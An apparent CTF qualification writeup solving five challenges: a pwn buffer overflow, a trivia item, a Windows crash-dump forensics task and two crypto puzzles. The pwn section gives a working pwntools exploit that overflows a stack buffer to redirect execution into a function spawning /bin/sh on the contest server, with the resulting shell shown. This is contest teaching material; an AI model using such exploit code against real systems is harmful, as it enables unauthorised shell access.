@Hack CTF qualification Writeup

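This competition was held from 2021/11/20 21:00 (JST) to 2021/11/21 5:00 (JST).
I took part with a team again this time. We finished 44th out of 338 teams with 408 points.
Below are writeups for the challenges I solved myself.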

PWN 1 (PWN 100)

Decompile main with Ghidra.

undefined8 main(void)

{
  setvbuf(stderr,(char *)0x0,2,0);
  setvbuf(stdout,(char *)0x0,2,0);
  vuln();
  return 0;
}

void vuln(void)

{
  char local_12 [10];
  
  fgets(local_12,0xaa,stdin);
  return;
}

void mysterious_function(void)

{
  system("/bin/sh");
  return;
}

Use a BOF to call the mysterious_function function.

$ gdb -q ./main
Reading symbols from ./main...(no debugging symbols found)...done.
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ r
Starting program: /mnt/hgfs/Shared/main 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers----------------------------------]
RAX: 0x7fffffffde46 ("AAA%AAsAABAA$AA"...)
RBX: 0x0 
RCX: 0x1f 
RDX: 0x7ffff7dcf8d0 --> 0x0 
RSI: 0x7fffffffde46 ("AAA%AAsAABAA$AA"...)
RDI: 0x7fffffffde47 ("AA%AAsAABAA$AAn"...)
RBP: 0x41416e4141244141 (b'AA$AAnAA')
RSP: 0x7fffffffde58 ("CAA-AA(AADAA;AA"...)
RIP: 0x40066c (<vuln+34>:	ret)
R8 : 0x6022c5 --> 0x0 
R9 : 0x7ffff7fda4c0 (0x00007ffff7fda4c0)
R10: 0x602010 --> 0x0 
R11: 0x246 
R12: 0x400550 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdf40 --> 0x1 
R14: 0x0 
R15: 0x0
[------------------------------------code-------------------------------------]
Display various information of current execution context
Usage:
    context [reg,code,stack,all] [code/stack length]

0x000000000040066c in vuln ()
gdb-peda$ patto CAA-AA(AADAA;AA
CAA-AA(AADAA;AA found at offset: 18

$ ROPgadget --binary ./main | grep ": ret"
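0x000000000040050e : ret

# Python 2 syntax (print statement), pwntools
from pwn import *

# No arguments: attack the remote service; any argument: run the local binary
if len(sys.argv) == 1:
    p = remote('1-pwn.athack-ctf.com', 1337)
else:
    p = process('./main')

elf = ELF('./main')

mysterious_function_addr = elf.symbols['mysterious_function']
ret_addr = 0x40050e  # "ret" gadget found with ROPgadget above
offset = 18          # offset to the saved return address, from patto above
print hex(mysterious_function_addr)

# Padding up to the return address, then the ret gadget, then mysterious_function
payload = 'A' * offset
payload += p64(ret_addr)
payload += p64(mysterious_function_addr)

print payload
p.sendline(payload)
p.interactive()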

The execution result is as follows.

[+] Opening connection to 1-pwn.athack-ctf.com on port 1337: Done
[*] '/mnt/hgfs/Shared/main'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
0x400637
AAAAAAAAAAAAAAAAAA\x0e@\x00\x00\x00\x06\x00\x00\x00
[*] Switching to interactive mode
$ ls
flag.txt
main
ynetd
$ cat flag.txt
AtHackCTF{9302575208025782507402580}

AtHackCTF{9302575208025782507402580}

X BoF (Trivia 100)

The program failed when Unicode characters were inserted into input that was expected to be ASCII. The question asks which type of BoF is suspected in this case.

AtHackCTF{Unicode BoF}

Debug (DFIR 100)

A memory dump file is attached, and the flag format is given as "Flag Format: AtHackCTF{md5(FAILUREIDHASH_BUGCHECKCODE_FAILUREBUCKETID)}".
Open the dump in WinDbg and click !analyze -v.

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

SYSTEM_SERVICE_EXCEPTION (3b)
An exception happened while executing a system service routine.
Arguments:
Arg1: 80000003, Exception code that caused the bugcheck
Arg2: 05080cb3, Address of the instruction which caused the bugcheck
Arg3: 0632ed50, Address of the context record for the exception that caused the bugcheck
Arg4: 00000000, zero.

Debugging Details:
------------------

Unable to load image \??\C:\Windows\system32\drivers\myfault.sys, Win32 error 0n2

KEY_VALUES_STRING: 1

    Key  : Analysis.CPU.mSec
    Value: 765

    Key  : Analysis.DebugAnalysisManager
    Value: Create

    Key  : Analysis.Elapsed.mSec
    Value: 1762

    Key  : Analysis.Init.CPU.mSec
    Value: 2749

    Key  : Analysis.Init.Elapsed.mSec
    Value: 35838

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 100

    Key  : WER.OS.Branch
    Value: win7sp1_rtm

    Key  : WER.OS.Timestamp
    Value: 2010-11-19T18:50:00Z

    Key  : WER.OS.Version
    Value: 7.1.7601.17514


VIRTUAL_MACHINE:  VMware

BUGCHECK_CODE:  3b★

BUGCHECK_P1: 80000003

BUGCHECK_P2: fffff88005080cb3

BUGCHECK_P3: fffff8800632ed50

BUGCHECK_P4: 0

CONTEXT:  0632ed50 -- (.cxr 0xfffff8800632ed50)
eax=02ffba30 ebx=fffff880 ecx=fffffa80 edx=02ffba00 esi=0632fb60 edi=fffff880
eip=00000000 esp=00000000 ebp=fffffa80 iopl=0         nv up di pl nz na po nc
cs=0000  ss=0018  ds=f730  es=0000  fs=0000  gs=f880             efl=00000000
00000000`00000000 ??              ???
Resetting default scope

PROCESS_NAME:  notmyfault64.exe

IP_IN_FREE_BLOCK: 0

BAD_STACK_POINTER:  00000000

STACK_TEXT:  
00000000 00000000     00000000 00000000 00000000 0x0


SYMBOL_NAME:  myfault+1cb3

MODULE_NAME: myfault

IMAGE_NAME:  myfault.sys

STACK_COMMAND:  .thread ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_KERNEL_CONTEXT_0x3B_80000003★

OS_VERSION:  7.1.7601.17514

BUILDLAB_STR:  win7sp1_rtm

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 7

FAILURE_ID_HASH:  {e531da8c-62d2-198a-1c77-b5a06a202afd}★

Followup:     MachineOwner
---------

$ echo -n "e531da8c-62d2-198a-1c77-b5a06a202afd_3b_INVALID_KERNEL_CONTEXT_0x3B_80000003" | md5sum
db5f4defc49e3a126bbe7d9a7ca548fa  -

AtHackCTF{db5f4defc49e3a126bbe7d9a7ca548fa}
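
The manual copy-and-paste step above can be scripted. The following is an added example, not part of the original writeup: it pulls the three fields out of saved !analyze -v text and builds the string that gets hashed. The function names and the embedded sample (lines copied from the output above, including the ★ marks) are assumptions made for illustration.

```python
import hashlib
import re

# Order required by the flag format: FAILUREIDHASH_BUGCHECKCODE_FAILUREBUCKETID
FIELDS = ("FAILURE_ID_HASH", "BUGCHECK_CODE", "FAILURE_BUCKET_ID")

# Sample input: a few lines taken from the !analyze -v output shown above.
SAMPLE = """\
BUGCHECK_CODE:  3b★

BUGCHECK_P1: 80000003

FAILURE_BUCKET_ID:  INVALID_KERNEL_CONTEXT_0x3B_80000003★

OSNAME:  Windows 7

FAILURE_ID_HASH:  {e531da8c-62d2-198a-1c77-b5a06a202afd}★
"""

def parse_analyze(text):
    """Return the three flag fields from '!analyze -v' text as a dict."""
    found = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Z0-9_]+):\s*(.*)$", line)
        if m and m.group(1) in FIELDS:
            # Drop the writeup's ★ annotation and the braces around the GUID.
            value = m.group(2).strip().rstrip("★").strip()
            found[m.group(1)] = value.strip("{}")
    missing = [k for k in FIELDS if k not in found]
    if missing:
        raise ValueError("fields not found: " + ", ".join(missing))
    return found

def flag_input(fields):
    """Join the fields with '_' in the order the flag format demands."""
    return "_".join(fields[k] for k in FIELDS)

def make_flag(text):
    digest = hashlib.md5(flag_input(parse_analyze(text)).encode()).hexdigest()
    return "AtHackCTF{" + digest + "}"

if __name__ == "__main__":
    print(flag_input(parse_analyze(SAMPLE)))
    print(make_flag(SAMPLE))
```
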

Fun Math (Crypto 100)

Each character is encrypted separately, so the flag can be recovered by brute force.

#!/usr/bin/env python3
def my_function(x):
    return pow(x,3)+10*pow(x,2)+x*7 + 6

cipher = [317336, 1696274, 425598, 1007448, 1069008, 1340288, 346128, 663858, 392496, 2013024, 734808, 1233758, 1268616, 1069008, 1233758, 948296, 142008, 1653936, 948296, 516368, 133974, 1612308, 1133024, 948296, 392496, 1739328, 1452776, 948296, 641264, 133974, 497274, 1783104, 1268616, 1452776, 1199544, 948296, 1531158, 133974, 1377114, 1918824, 1452776, 133974, 1414608, 1268616, 1007448, 1377114, 1653936, 948296, 556008, 619188, 948296, 1037924, 619188, 1739328, 1696274, 1133024, 392496, 133974, 1612308, 1069008, 1268616, 1452776, 1199544, 290184, 47064, 2110256]

flag = ''
for c in cipher:
    for code in range(32, 127):
        if my_function(code) == c:
            flag += chr(code)
            break

print(flag)

AtHackCTF{Which_1s_M0re_Fun_S0Lving_p0lyn0mials_OR_bRuteF0rcing?!}
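
The brute force works because the polynomial is applied to one small code point at a time. As an added example (not from the original writeup) that goes beyond printable ASCII: every coefficient is positive, so my_function is strictly increasing for x >= 0 and can be inverted by binary search over the whole Unicode range. The names invert and decrypt and the upper bound are assumptions.

```python
def my_function(x):
    # Same polynomial as in the solver above.
    return pow(x, 3) + 10 * pow(x, 2) + x * 7 + 6

def invert(c, hi=0x110000):
    """Return x in [0, hi) with my_function(x) == c, or None if there is none.

    Relies on my_function being strictly increasing for x >= 0.
    """
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        y = my_function(mid)
        if y == c:
            return mid
        if y < c:
            lo = mid + 1
        else:
            hi = mid
    return None

def decrypt(cipher):
    """Invert every ciphertext value; fail loudly on a value with no preimage."""
    out = []
    for c in cipher:
        x = invert(c)
        if x is None:
            raise ValueError("no preimage for %d" % c)
        out.append(chr(x))
    return "".join(out)

# First three values of the cipher list above.
SAMPLE = [317336, 1696274, 425598]

if __name__ == "__main__":
    print(decrypt(SAMPLE))
```
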

Complex (Crypto)

Use the formula for the square root of a complex number to compute a and b. Then compute each x with inverse and build up the flag.
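
The formula referred to here, written out as an added derivation (not part of the original writeup), assuming the unknown a + bi with a, b >= 0 satisfies (a + bi)^2 = c + di, and writing K for the modulus of c + di as the script below does:

\begin{align*}
(a + bi)^2 = c + di &\implies a^2 - b^2 = c, \quad 2ab = d \\
|a + bi|^2 = |c + di| &\implies a^2 + b^2 = K = \sqrt{c^2 + d^2} \\
a^2 = \frac{K + c}{2}, &\quad b^2 = \frac{K - c}{2}
\end{align*}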

#!/usr/bin/env python3
import gmpy2
from Crypto.Util.number import *

c = 6983291701597905
d = 5336385994037448
parts = [380932079629368, 191767163205492, 391844072538906, 242715789325632, 636916609920084, 101350594515744, 701115392013585, 136776893476692, 666218469621657, 205565478406008, 588555394058607, 3755755500]
p = 14088005995134184327

K2 = c ** 2 + d ** 2
K = gmpy2.iroot(K2, 2)[0]
assert K**2 == K2

a2 = (c + K) // 2
a = gmpy2.iroot(a2, 2)[0]
assert a**2 == a2

b2 = (- c + K) // 2
b = gmpy2.iroot(b2, 2)[0]
assert b**2 == b2

flag = b''
for i in range(len(parts)):
    if i % 2 == 0:
        x = (parts[i] * inverse(a, p)) % p
    else:
        x = (parts[i] * inverse(b, p)) % p
    flag += long_to_bytes(x)

flag = flag.decode()
print(flag)

AtHackCTF{C0mpl3xxxx_Ev3ryWheRe!!}